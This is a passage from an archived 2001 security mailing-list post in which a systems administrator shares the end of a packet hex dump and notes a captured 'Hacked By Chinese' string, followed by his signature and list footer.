    0x0010   d956 d651 0050 0fc5 04c3 3325 e2c8 192f        .V.Q.P....3%.../
    0x0020   5010 2da0 5e70 0000                            P.-.^p..
    
    Then the packet below. I caught the one below first for obvious reasons: "Hacked By Chinese". :) That's pretty much the whole stream (bar the bye-byes).
    
    HTH some more.
    
    Rgds,
    
    Scott
    
    
    Scott Nursten - Systems Administrator
    ----------------------------------------------
    ddi:   +44 (0) 1293 744 122
    work:  +44 (0) 1293 402 040
    fax:   +44 (0) 1293 402 050
    email: scottnat_private
    wwweb: http://www.streetsonline.co.uk
    ----------------------------------------------
    
    			"Without order nothing can exist - without chaos nothing can evolve."
    
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 14:00:42 PDT